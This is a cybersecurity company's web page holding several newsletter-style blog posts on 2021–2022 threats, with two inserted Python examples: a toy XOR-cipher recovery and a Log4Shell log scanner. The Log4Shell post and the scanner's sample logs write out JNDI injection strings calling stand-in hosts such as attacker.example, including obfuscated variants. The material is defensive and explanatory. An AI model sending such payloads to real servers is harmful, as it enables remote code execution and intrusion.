Empowering Clients to the next level of Cybersecurity

A Cybersecurity Partner You Can Trust

We are strategists, engineers, analysts, and governance experts embedded in the world’s biggest cyber missions and trusted to advance them.

Our high standards in servicing clients are exemplified through information security, quality and IT service management certifications, both at individual and organisational levels.
Our Services
Managed Detection & Response

CyBourn’s Managed Detection and Response Service maintains seamless integration with our clients’ IT infrastructure and processes. We deliver optimum levels of hardware and software integration, enabling analysts to rapidly detect threats. Our incident handling process ensures that threat mitigation activity commences immediately following identification.

Penetration Testing

Penetration Testing is a method for gaining assurance in the security of an IT system by attempting to breach some or all of that system’s security, using the same tools and techniques as an adversary might. Penetration testing should be viewed as a method for gaining assurance in your organisation’s vulnerability assessment and management processes, not as a primary method for identifying vulnerabilities.

Incident Response

Our incident response methodology is designed to provide a common framework for our incident responders to work and interact as part of the SOC ecosystem in order to react quickly and effectively to identified threats within infrastructure while coordinating their actions with monitoring and detection teams as well as other incident responders.

Threat Hunting

Our threat hunting methodology is designed to provide a common framework for our threat hunters to work and interact as part of the SOC ecosystem in order to provide targeted threat detection and effective, continuous improvement to our automated detection and response capabilities.

Cybersecurity Awareness Training

CyBourn builds and executes complex social engineering scenarios to test awareness levels of internal staff. As the number one entry point for data breaches, phishing techniques are very hard to mitigate. The best solution to cope with such threats is maintaining high levels of awareness.


Secure your remote workforce

Implementing effective cybersecurity measures is particularly challenging today because there are more devices than people, attackers are becoming more innovative, and we are facing the fact that there will forever be more remote workers in the new post-pandemic world.

The latest cyber-offensive intelligence to identify and address security risks

Defending against cyber threats requires an in-depth understanding of how attackers operate. Our extensive experience of conducting pen testing, red teaming and other ethical hacking engagements around the world means we have first-hand knowledge of the latest adversarial tactics and wide-ranging insight into how to safeguard against them.

Incorporating your tools 

CyBourn delivers ultramodern solutions in consultation with our clients’ IT and risk departments enabling a high degree of scalability and customisation. We can utilise existing client tools, or act as security integrators to recommend and implement open-source, commercial, or off-the-shelf products.

CyBourn takes a unique bespoke approach to developing cybersecurity solutions

We deploy SOAR (Security Orchestration, Automation, and Response) solution stack to ensure deep visibility, continuous analysis, and rapid response. If an existing product or solution does not offer the needed level of visibility for you, CyBourn can build custom tools to collect relevant data.

CyBourn leverages bespoke ML algorithms.

CyBourn leverages machine learning algorithms to build network and user behavioural patterns, detect anomalies accurately, perform in-depth investigations, and act swiftly to contain potential threats, enhance proactive analysis, and map behaviour.

Drive decisions through powerful data

Integrate your essential data and information security indicators to empower your data driven decision making and response capabilities with EtherLast.

We offer global coverage

Enabled by our global R&D and continuous internal development process, we cover the entire cybersecurity landscape for enterprises across industries, sectors and geographies.

End-to-end solutions

We live the policies, architectures, and intelligence that define cyber enterprises and operations. Our experts have significant experience in offering state-of-the-art monitoring solutions, best in class incident response services, and tailored strategic cybersecurity consulting.

What’s trending at CyBourn
The Cybersecurity Express – April 1st 2022
Blog | 1 APR, 2022
A crazy place to be in right now, the 2022 cyberspace: with so much cyber activity happening, it’s hard not to be anxious and excited at the same time. Although at times alarming, CyBourn’s Cybersecurity Express is here to help you visit these emerging threats from the comfort of your seat. But remember, if you are alive in these modern times then you are exposed (unless you are some sort of a virtual Bear Grylls and chose to live a life off-grid), and you are swimming in open waters where the sharks are always lurking… So, get your scuba gear ready, because we are about to dive into the cybersecurity abyss: Russia’s war has an intensifying cyber-front and will imminently target the USA and its allied countries, the US intelligence community openly warns. Please make sure to secure your air tanks while we take a look at the cyber-criminal group LAPSUS$ and their latest hacks. Keep your fins inside while the train is moving past a critical information disclosure vulnerability found in VMware vCenter.

“Russian Cyber-attacks will Continue”

It is a sad truth that Russian attacks against Ukraine are continuing, both physical and cybernetic, but the latter seems to be a gray area. Confined by the fact that the world is uniting to help Ukraine, and because of the sanctions, Russia is exploring options for cyber-attacks to weaken allied forces, so warns US intelligence. So far, due to their intangible and (partially) anonymous nature, cyber-attacks are yet to be considered “an act of war”, and can be used without many repercussions, but that really depends on the interpretation of the victim state. Russian state intelligence agencies and/or related criminal gangs could be used to target US Government departments and agencies, hospitals, critical infrastructure, and utilities.

President Biden and CISA first warned the private sector, which owns much of America’s critical infrastructure and hasn’t always heeded government warnings, to immediately harden its online defenses, warnings that we covered in a previous Cybersecurity Express. “The magnitude of Russia’s cyber capacity is fairly consequential, and it’s coming,” the President warned. “He hasn’t used it yet, but it’s part of his playbook,” Biden said of Putin. Cyber-attacks may be Putin’s only way to “punish” the West for the crippling sanctions and for the anti-tank and anti-aircraft weapons sent to Ukraine; all this is backed by the fact that Russia has a history in cyber-warfare.

Although the president stated that the US will retaliate severely to any such attacks on US Government infrastructure and on US medical, utility and supply infrastructure – what can the private sector do to stay safe? The same good measures as always apply here and are the best and cheapest way to deter any Russian or other state-coordinated attacks, and that goes for any cyber-attacks in general:

Sensitive Information Disclosure in VMware vCenter

Although not yet given a CVSS score (at the time of writing), CVE-2022-22948 is a critical vulnerability due to its global-scale usage: it’s estimated that 80% of virtualized environments are running VMware technology. This vulnerability is part of a critical kill chain that leads to an ESXi takeover, complete with virtual machines, from just endpoint access to a host with a vCenter client. Researchers published these findings alongside the PoC (proof of concept), and it’s a lengthy process, involving multiple steps and multiple vulnerabilities.

To summarize it, first they gain shell access to an instance of VMware vCenter by exploiting CVE-2021-21972, using the basic user rights to gain access to the Postgres database, where they can query extensive information about ESXi and vCenter, and also the contents of the ‘vpx_host’ table, which contains the details for a user called ‘vpxuser’ and its password phrase. The “vpxuser” user is created on the ESXi by default and it’s highly privileged so it can manage the vCenter without the use of root, as stated by its passwd description: “VMware VirtualCenter administration account”. With a little bit of digging around, you can find all the information needed to be able to decrypt the password. Well, almost all of the information, because you need a privilege escalation technique to be able to read “/etc/vmware-vpx/ssl/symkey.dat”, but “luckily” there is a privilege escalation vulnerability for that as well.

To keep safe from CVE-2022-22948, be sure to apply the patches on VMware’s Advisory site. There is no known workaround, so make sure to crank up those updates.

The Cybercriminal Group LAPSUS$

Of all the cyberattacks taking place lately and all the criminal groups involved, few stand out like Lapsus$. They are a relatively new cybercrime group that specializes in stealing data from big companies and threatening to publish it unless a ransom is paid, with the bulk of the group’s victims (15 of them) having been in Latin America and Portugal. “Little is known of the origins of the group, however, given that Lapsus$’s initial activity was directed towards several organizations in Brazil, some researchers have speculated that the group is based in South America,” researchers say. They have risen to “fame” quickly after successfully breaching companies like Nvidia, Microsoft, Okta and Globant.

Microsoft on Tuesday confirmed that the Lapsus$ extortion-focused hacking crew had gained “limited access” to its systems, as authentication services provider Okta revealed that nearly 2.5% of its customers have been potentially impacted in the wake of the breach. Globant also confirmed a breach after Lapsus$ leaked 70GB of their data, and so did Nvidia and Okta. The companies have stated that the information exfiltrated is not of major importance and have contacted the victims to mitigate the outcome. It makes your skin crawl to think where they are already infiltrated by now, waiting to leak the data, and we don’t even know it.

That’s it for this edition of CyBourn’s Cybersecurity Express. Hope you enjoyed the ride, and we await your return for the next journey. We know the subjects presented here can be scary, but it’s much better to be aware and educated, so that we begin to prepare our defenses, so that we are prepared to respond and fight back!
The Cybersecurity Express – Issue #6
Blog | 11 MAR, 2022
You hear the Cybersecurity Express approaching as you near the platform. Everything seems to be in order and on schedule, but you notice one key difference: the colors of the train, blue and yellow. Reality soon settles in as you face an undeniable truth: there is no denying this, we are all impacted and sooner or later we will have to face the music. The train will take you through the cybernetic battlefront, as we need to see firsthand the implications and take the necessary approach in order to properly defend your organization. From the comfort of your seat, you will see history being written and how the stance between cyber-criminals and cybersecurity specialists is changing from here onward.

It was inevitable that we would talk about the grotesque Russian invasion of Ukraine, the implications of it all and how real-life conflict is bleeding into the digital realm. It’s chaos: Russia is attacking on all fronts, the world is united by circumstance against a common foe, bad actors are now switching to fight for the good cause and other groups are just taking advantage of the mess, playing their cards on both sides to maximize personal gains.

Revelations of the Past

This whole mess started back in 2014 when the pro-Russian hacktivist group CyberBerkut was hired to disrupt/manipulate the 2014 Ukrainian presidential elections, where they employed a combination of malware, file deletion and DDoS tactics, but were ultimately not successful, resulting in a pro-western party being elected. This was followed by the first known successful cyber-attack against a power grid, compromising systems of three energy distribution companies. On the eve of Ukraine’s Constitution Day in 2017, we were presented with one of the “most devastating cyber-attacks in history”: the NotPetya wiper malware.

Targeting both public and private sector entities, the attack was highly disruptive in nature as it disabled computers by wiping hard drives and spread independently to companies that used a popular tax-filing software (M.E.Doc). The malware was not designed to be decrypted; money was not what the perpetrators were after.

A New Face of War

In the beginning of 2022, we started seeing the wiper attacks that we are all familiar with now, the first of which being “WhisperGate”, discovered by Microsoft, which disrupted government, non-profit, and information technology organizations, followed by the more recent “HermeticWiper” that affected hundreds of computers, this time including Latvia and Lithuania as targets, with “IsaacWiper” being the latest of this kind. In the meantime, defacement of government and public institution websites took place with political imagery presenting the message “Prepare for the worst”, and the biggest DDoS attack Ukraine has ever witnessed brought down websites of several Ukrainian banks and government departments, including the Ministry of Foreign Affairs, Ministry of Defense and Ministry of Internal Affairs among others. All of these coupled with misinformation/disinformation being spread to the masses with unprecedented ease due to the online nature of today’s world, where the real war is fought on social media platforms like YouTube, Facebook, Instagram, WhatsApp, Telegram and TikTok, between the lies and the truth. These media networks have turned out to be a double-edged sword for the oppressors, not only being used by them to spread misinformation to the Russian people and to the world, but also against them, being the only way for the truth to get in. On the other flank, we see the world uniting and collaborating like never before, fighting back, doubling down on the oppressor, giving them a taste of their own medicine. Even some malicious cyber-groups have joined the just cause, for now, fighting for freedom and righteousness, united against a common foe.

The Future is Being Decided

As we saw in the tactics used so far, wipers masked as ransomware, DDoS disruptions and misinformation seem to be the weapons of choice, and they are being deployed in sneaky ways, at scales never seen before. This was something that the Cybersecurity and Infrastructure Security Agency (CISA) had foreseen, and together with the FBI and the NSA it released a joint Cybersecurity Advisory (CSA) providing an overview of Russian state-sponsored cyber operations, including commonly observed tactics, techniques, and procedures, and has been posting recommendations regularly.

Cloudflare announced they will keep providing their services to Ukraine, Belarus and Russia, however with certain security measures in place. They side with Ukraine and are willing to comply with all the requirements of the sanctions imposed against Russia, also taking drastic measures such as bricking the servers, should they go online. The firm argued that services should be kept operational within Russia as the internet is the only source from which the people can get reliable information.

DDoS attacks are becoming more common and more potent than ever before through new and clever ways. Researchers uncovered new reflection/amplification DDoS methods that provide a record-breaking amplification ratio of almost 4.3 billion to 1. Reflection attacks start with a small packet reflected inside a closed network while its size gets amplified with each loop. When reaching the possible upper limit, the resulting volume of traffic is channeled to the target. For this DDoS method, threat actors are abusing vulnerable Mitel devices, such as MiVoice Business Express and MiCollab, or are leveraging the functionality of middleboxes. One notable difference of these vectors compared with most UDP reflection methodologies is that they can sustain lengthy DDoS attacks, lasting for up to 14 hours. “The single largest observed attack of this type to date was approximately 53 million pps and 23 gb/sec.”

The threat actors need a way in, and most of the time the weakest link for compromising a network remains human. Google has issued a warning of an increase in phishing campaigns conducted by government-backed groups. The purpose of these will be to sweep the nations, especially eastern EU countries, for vulnerable spots in order to compromise networks for future attacks. Threat actor groups such as the Belarusian Ghostwriter and the Russian FancyBear launched, in the past several days, credential phishing campaigns using compromised email accounts targeting Polish and Ukrainian military and government organizations.

An Awakening

Out of all the unknowns, one thing is certain: we are seeing an increase in digital oppression and new, cunning ways to abuse the system, in a manner from which we may never go back. The good in all of this is that the world is starting to notice how vulnerable the digital medium is and how real the harm reflected into the physical world is. The masses are having an awakening to the importance of the service that cybersecurity companies provide. Among them CyBourn, standing with the oppressed, against the oppressors! An awakening to the ever-increasing need for the protection they provide against evolving actors, who have proven time and time again that we are as vulnerable in here as we are out there.
The Cybersecurity Express – Issue #5
Blog | 21 FEB, 2022
Good day and welcome aboard the Cybersecurity Express for another information-packed adventure to the corners of the malicious underground to satisfy your appetite for shady tech news. On today’s ride, we will visit the past and see how a forgotten botnet malware is being brought back to life, a ransomware’s software flaw being used to decrypt its very own encrypted files, and lastly, because you’ve been good the past year, CISA put together a present, just for you.

IoT Still Haunted by the Ghost of Mirai

In this day and age, considering how rapidly software and computing evolve, 6 years is a really, really long time. So, it’s safe to assume that you may be too young to know about the Mirai malware, which harnessed the power of about 100,000 IoT devices running Linux (like the smart TV in your living room, or your Wi-Fi enabled light bulb) to almost bring down the entirety of the US internet in October 2016. The targets were the DNS servers of Dyn, a company that controls much of the Internet’s domain name system infrastructure. This attack was of an unprecedented scale for its time, managing to bring down web giants such as Twitter, the Guardian, Netflix, Reddit, CNN, among others. Perhaps it was fate which made it so that the name chosen at the time was Mirai, which means “future” in Japanese, foreshadowing that the soul of this malware would, one day, come back to haunt us. Or maybe the researchers really understood that, although still in its infancy back then, the IoT would only multiply in the coming years, and that what they had just witnessed was only a taste of what the future had to offer. It just so happens that 2020 and 2021 data revealed an increase in IoT device-led attacks, and given that the total number of IoT devices connected worldwide is projected to be about 30.9 billion devices by 2025, this is a trend that we’ll only start hearing more of.

The situation is only made worse by the security breaches suffered by compromised IoT manufacturers and the leaked confidential data being sold on the black market. Armed with this knowledge and having more targets to infect (the targets themselves only getting more powerful), it’s only a matter of time until something terrifying happens, the likes of which we have never seen before. With the power of research and technology, specialists at Intel 471 managed to pierce into the underworld, by analyzing data from compromised IoT devices (mainly in Europe and North America), and steal a glimpse of a specter, brought forth by the deployment of two kinds of botnet malware built on some familiar code bases, carrying out the echo of a long-lost attack that once stumped the world: Gafgyt and Mirai. Just to name a few based on the latter: BotenaGo, Echobot, Loli, Moonet, Mozi and Zeroshell, which have been active since the start of the COVID-19 pandemic in early 2020 and have continued to evolve throughout 2021. And to put this in perspective, let’s name some of the vulnerabilities affecting IoT that have been disclosed lately:

This leaves many possible options for both the attackers and the defenders. All is not lost, as such research is done for the sole purpose of understanding how the underground is leveraging the flaws in these devices and then deploying the correct defenses. Proactive measures can be taken to prevent damage, as such is the mission of cybersecurity service providers like CyBourn.

Ransomware Encrypted Data, Decrypted by Researchers

Just as the title suggests, researchers at South Korea’s Kookmin University have managed what they call the “first successful attempt” at decrypting data infected with Hive ransomware “without the attacker’s private key, by using a cryptographic vulnerability identified through analysis”. First observed in June 2021, when it struck a company called Altus Group, Hive leverages a variety of tactics to infect its victims as well as scare them, not just by encrypting the data but also by exfiltrating sensitive data and threatening to post it publicly, in a tactic called double extortion. Since then, they have victimized more than 355 companies. But now a glimmer of hope arises as the researchers claim that they were able to weaponize a flaw in the encryption algorithm to devise a method to reliably recover more than 95% of the keys employed during encryption.

“For each file encryption process, two keystreams from the master key are needed,” the researchers explained. “Two keystreams are created by selecting two random offsets from the master key and extracting 0x100000 bytes (1MiB) and 0x400 bytes (1KiB) from the selected offset, respectively.” The encryption keystream, which is created from an XOR operation of the two keystreams, is then XORed with the data in alternate blocks to generate the encrypted file. But this technique also makes it possible to guess the keystreams and restore the master key, in turn enabling the decoding of encrypted files without the attacker’s private key.

CISA Lists Free Security Tools and Services

In an effort to help organizations fight off malicious actors and reduce their cybersecurity risk, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a repository of free tools and services, encompassing a mix of 101 “items” provided by CISA, open-source utilities, and private and public sector organizations across the cybersecurity community. “Many organizations, both public and private, are target rich and resource poor,” CISA Director Jen Easterly said in a statement. “The resources on this list will help such organizations improve their security posture, which is particularly critical in the current heightened threat environment.”

This is not the first time CISA launches initiatives to help organizations maximize resilience by campaigning for patching software security flaws, enforcing multi-factor authentication, and halting bad practices. Just in the recent past they gave us known exploited vulnerabilities, cybersecurity procedures, guidance for resisting ransomware infections as well as threats associated with nefarious information and influence operations, and just last week’s “Shields Up” campaign notifying organizations in the U.S. of potential risks arising from cyber threats that can disrupt access to essential services and potentially result in impacts to public safety. “Malicious actors may use tactics — such as misinformation, disinformation, and malinformation — to shape public opinion, undermine trust, and amplify division, which can lead to impacts to critical functions and services across multiple sectors,” CISA said.

That’s a wrap for today’s Cybersecurity Express ride, and we thank you for being onboard. Be on the lookout for when we post the next itinerary, for we will want you back. Until then, stay safe!
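The Hive write-up above describes a keystream built by XORing two slices of a master key and applied to the file in alternate blocks. The following toy model, added here as an illustration and not part of the original post, shows in working code why that shape is fragile from a defender's point of view: the pass-through blocks sit in the clear, and one file whose contents are already known (a stock template, a standard header) leaks the keystream that opens every other file encrypted with the same slices. It is a constructed model, not Hive's real algorithm or the Kookmin researchers' recovery method; the stream sizes, block size, master key and sample files are all made up and scaled down.

```python
"""Toy model of an XOR-keystream file cipher and why known plaintext breaks it.

Constructed illustration, not Hive's actual algorithm and not the Kookmin
University researchers' recovery method. It only mirrors the shape the post
describes: two streams cut from a master key at two offsets, combined with
XOR, then XORed onto the file in alternate blocks.
"""
from math import gcd

MASTER_KEY_LEN = 4096   # toy size; the post describes far larger streams
STREAM_A_LEN = 256      # stands in for the 0x100000-byte (1 MiB) stream
STREAM_B_LEN = 16       # stands in for the 0x400-byte (1 KiB) stream
BLOCK = 32              # even-numbered blocks are XORed, odd-numbered ones pass through
# The combined keystream repeats every lcm(STREAM_A_LEN, STREAM_B_LEN) = 256 bytes.
PERIOD = STREAM_A_LEN * STREAM_B_LEN // gcd(STREAM_A_LEN, STREAM_B_LEN)


def derive_keystream(master_key: bytes, off_a: int, off_b: int, length: int) -> bytes:
    """Keystream = stream_a XOR stream_b, each cut from the master key at its offset.
    Both streams are cycled so that any file length can be covered."""
    stream_a = bytes(master_key[(off_a + i) % len(master_key)] for i in range(STREAM_A_LEN))
    stream_b = bytes(master_key[(off_b + i) % len(master_key)] for i in range(STREAM_B_LEN))
    return bytes(stream_a[i % STREAM_A_LEN] ^ stream_b[i % STREAM_B_LEN] for i in range(length))


def xor_alternate_blocks(data: bytes, keystream: bytes) -> bytes:
    """XOR the keystream onto even-numbered blocks only; odd blocks are left as-is.
    XOR is its own inverse, so the same call encrypts and decrypts."""
    out = bytearray(data)
    for start in range(0, len(data), 2 * BLOCK):        # every other block
        for i in range(start, min(start + BLOCK, len(data))):
            out[i] ^= keystream[i]
    return bytes(out)


def recover_keystream(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """Known plaintext leaks the keystream: c XOR p = k for every encrypted byte.
    Positions inside pass-through blocks come out as 0, which is harmless because
    xor_alternate_blocks never touches those positions anyway."""
    return bytes(c ^ p for c, p in zip(ciphertext, known_plaintext))


def extend_keystream(recovered: bytes, length: int) -> bytes:
    """Stretch a recovered keystream to any length using its known period."""
    if len(recovered) < PERIOD:
        raise ValueError("need at least one full period of recovered keystream")
    return bytes(recovered[i % PERIOD] for i in range(length))


def demo() -> dict:
    """Two files encrypted under the same master key and offsets: the first has
    known (constructed) contents, the second is the one we want back."""
    master_key = bytes(((i * 2654435761) >> 8) & 0xFF for i in range(MASTER_KEY_LEN))
    off_a, off_b = 1000, 3000   # constructed per-file offsets, shared by both files here
    known = b"CONSTRUCTED KNOWN FILE, e.g. a stock template the victim also has. " * 8
    secret = b"Constructed confidential document contents that were encrypted. " * 4

    c_known = xor_alternate_blocks(known, derive_keystream(master_key, off_a, off_b, len(known)))
    c_secret = xor_alternate_blocks(secret, derive_keystream(master_key, off_a, off_b, len(secret)))

    # Weakness 1: odd-numbered blocks of the ciphertext are the plaintext, untouched.
    leaked = c_secret[BLOCK:2 * BLOCK] == secret[BLOCK:2 * BLOCK]

    # Weakness 2: one known file yields the keystream, which then opens the other file.
    keystream = extend_keystream(recover_keystream(c_known, known), len(secret))
    recovered = xor_alternate_blocks(c_secret, keystream)
    return {"leaked_block": leaked, "recovered_secret": recovered == secret, "period": PERIOD}


if __name__ == "__main__":
    print(demo())
```

The point for defenders is the one the researchers exploited: a keystream that is reused, periodic, or applied only to part of the data can be reconstructed from ciphertext plus any plaintext you already hold, so recovery of files without the attacker's key becomes a matter of analysis rather than luck.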
The Cybersecurity Express – Issue #4
Blog | 17 DEC, 2021
CyBourn’s very own Cybersecurity Express is once again leaving for fresh and exciting destinations. Hop aboard and journey through the latest news in cybersecurity. As usual, welcome onboard, and we are sure that you are eager to see what stops we will be making today. Everything seems to be in order, at first glance at the schedule. However, soon you start noticing something odd: most of the stops are closed for maintenance due to the same reason. How can it be that so many stations, so far apart, unrelated to each other, each serving its unique purpose, are all affected by the same faulty module? Can one module be so widely used?! Yes, and such is the case with this week’s spotlight program, Log4j!

Log4j and the Log4Shell vulnerability. More like LogFromHell.

If a couple of days ago only a few knew about this module, now it’s the talk of the town. That is, if you haven’t been living under a rock. If you have though, don’t worry, the Cybersecurity Express will bring you up to speed, with a complete picture of the chaos from the past few days. Before we get into the mess of it all, let’s dig into a little bit of the background, shall we? Log4j 2 is an open-source, Java-based logging framework commonly incorporated into Apache web servers and Spring Boot web applications, but also used to log events and messages generated by software applications, some of which you might have heard of. By few, we really mean an unimaginable number, because we’re talking about:

An extensive list of the known vulnerable applications is maintained by the Dutch National Cyber Security Centre in its GitHub repository, and believe me, it is quite a long scroll to get to the bottom. Signs of exploitation attempts and weaponization began to surface ten days before the vulnerability came to light, and since then, we have seen attackers deploying cryptocurrency miners, Cobalt Strike drops, ransomware, and botnet recruitment. “Earliest evidence we’ve found so far of Log4j exploit is 2021-12-01 04:36:50 UTC… However, we don’t see evidence of mass exploitation until after public disclosure,” researchers said. It is impossible to say for certain when this was first exploited, but the danger of JNDI lookups was mentioned in a Black Hat talk all the way back in 2016 and somehow went under the radar, and, since the Apache Log4j 2.0-beta9 release was on September 21, 2013, it is possible that a witty actor discovered this soon after. Dubbed Log4Shell, CVE-2021-44228 has a CVSS score of a “perfect” 10, and that’s as high as they go. That score is due to the widespread use of the program and the relative ease with which the exploit can be applied, allowing remote code execution in Log4j versions 2.0-beta9 up to 2.14.1.

What makes this exploit so easy?

JNDI (Java Naming and Directory Interface) and LDAP can be used together by a Java program to locate a Java object (JNDIObject) on an LDAP server running on the same computer (localhost) on port 389 and read attributes from it using the URL ldap://localhost:389/o=JNDIObject. An attacker can control the LDAP URL by causing Log4j to log a string like ${jndi:ldap://payload.com/a}, resulting in a connection to payload.com to retrieve the object. And, because of how Log4j is built, all it takes to leverage the vulnerability is to send a specially crafted string containing the malicious lookup that gets logged by Log4j version 2.0 or higher. We used LDAP for this example, but it works with LDAP, RMI or DNS alike.

What are the attackers after?

“The bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers,” the Microsoft 365 Defender Threat Intelligence Team said. “Based on the nature of the vulnerability, once the attacker has full access and control of an application, they can perform a myriad of objectives.” A group of attackers managed to achieve remote code execution (RCE) and download a .NET binary from a remote server that encrypts all files with the extension “.khonsari” and displays a ransom note urging the victims to make a Bitcoin payment in exchange for recovering access to the files. It’s hard to say what the end goal is here, and it is just as hard to compile a list of IOCs, because hackers are taking a spray-and-pray approach just to wreak havoc. “This vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string,” security expert Marcus Hutchins tweeted. The overall scale of this is hard to grasp, but measures like the Cybersecurity and Infrastructure Security Agency (CISA) giving federal agencies an ultimatum to patch systems against the critical vulnerability, and the fact that Ingenuity (NASA’s helicopter mission on Mars) is susceptible to this exploit, kind of put it in perspective. Oh, and by the way, this last-mentioned fact makes this the first interplanetary exploit… probably. Despite that, researchers have been hard at work compiling lists of checks, GitHub repositories, and tools you can use to see if you are vulnerable, apply workarounds to mitigate the attack or find traces of exploitation.

What can you do?

If your organization uses the log4j library, upgrade to log4j-2.16.0 immediately. You should also be sure that your Java instance is updated. From Log4j 2.15.0 on, this behavior has been disabled by default. To make things worse, the release of the patched version came with news of another vulnerability, CVE-2021-45046, revealing that the module is also prone to a denial of service attack, which attackers are now also exploiting. Also, consult the Git repositories to see what helps, check the list of affected vendors and apply the latest patches particular to each software, should they be released. If, for any reason, you are unable to update, you could:

As this ride onboard the Cybersecurity Express draws to an end, you feel relieved and are now better prepared to face the Log4Shell exploit. This is indeed a subject worthy of the entire attention it’s getting. We bid you goodbye and humbly await your return onboard.
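The post says the only thing an attacker needs is to get a ${jndi:...} lookup string into something the application logs, which also tells a defender what to look for in web server and application logs. The script below is an added example, not code from the post or from CyBourn, showing the detection side: it scans log lines for the ${jndi:<scheme>:...} form described above after undoing two things that hide it from a plain substring search, URL-encoding in request paths and nested ${lower:..}/${upper:..} lookups, which Log4j resolves before the jndi lookup runs. The host name attacker.example and every log line are constructed.

```python
"""Detect Log4Shell-style JNDI lookup strings in log lines.

Constructed example for a detection pipeline. The log lines in SAMPLE_LOG and
the host name attacker.example are made up. The detector looks for the
${jndi:<scheme>:...} form the post describes (ldap, ldaps, rmi, dns) after
URL-decoding and collapsing nested ${lower:x}/${upper:x} lookups.
"""
import re
from typing import List, Tuple
from urllib.parse import unquote

# ${jndi:ldap:...}, ${jndi:ldaps:...}, ${jndi:rmi:...}, ${jndi:dns:...}
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns)\s*:[^}]*\}", re.IGNORECASE)

# Innermost ${lower:x} / ${upper:x}; applied repeatedly until none are left.
CASE_LOOKUP_RE = re.compile(r"\$\{\s*(lower|upper)\s*:\s*([^{}]*)\}", re.IGNORECASE)


def _apply_case(match: "re.Match") -> str:
    """Resolve one case lookup the way Log4j would, yielding its inner value."""
    value = match.group(2)
    return value.lower() if match.group(1).lower() == "lower" else value.upper()


def normalize(text: str) -> str:
    """URL-decode, then collapse nested case lookups from the inside out."""
    text = unquote(text)
    previous = None
    while previous != text:
        previous = text
        text = CASE_LOOKUP_RE.sub(_apply_case, text)
    return text


def find_jndi_lookups(line: str) -> List[str]:
    """Every JNDI lookup string in one log line; an empty list means nothing found."""
    return [m.group(0) for m in JNDI_RE.finditer(normalize(line))]


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """(line number, lookup) for each hit, ready to hand to an alerting pipeline."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for lookup in find_jndi_lookups(line):
            hits.append((number, lookup))
    return hits


# Constructed Apache-style access log lines: one benign, three carrying a lookup
# (plain, URL-encoded in the path, nested case lookups), and one with a harmless
# non-jndi lookup to show it does not trigger.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '203.0.113.8 - - [10/Dec/2021:10:00:03 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 200 12 "-" "curl/7.79"',
    '203.0.113.9 - - [10/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "${${lower:j}ndi:${upper:rmi}://attacker.example/b}" "-"',
    '203.0.113.10 - - [10/Dec/2021:10:00:05 +0000] "GET /?d=${date:yyyy} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, lookup in scan(SAMPLE_LOG):
        print(f"line {number}: {lookup}")
```

Run against SAMPLE_LOG this reports lines 2, 3 and 4 and stays quiet on the benign lines. A detector like this is a triage aid, not a substitute for the upgrade the post recommends: it only sees what reached the logs it reads, and any field an application logs (headers, form values, usernames) is a possible carrier, so the input should be every log source, not just the access log.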

Tell us about your Cybersecurity needs

We are strategists, engineers, analysts, and governance experts embedded in the world’s biggest cyber missions and trusted to advance them. Let us help you today.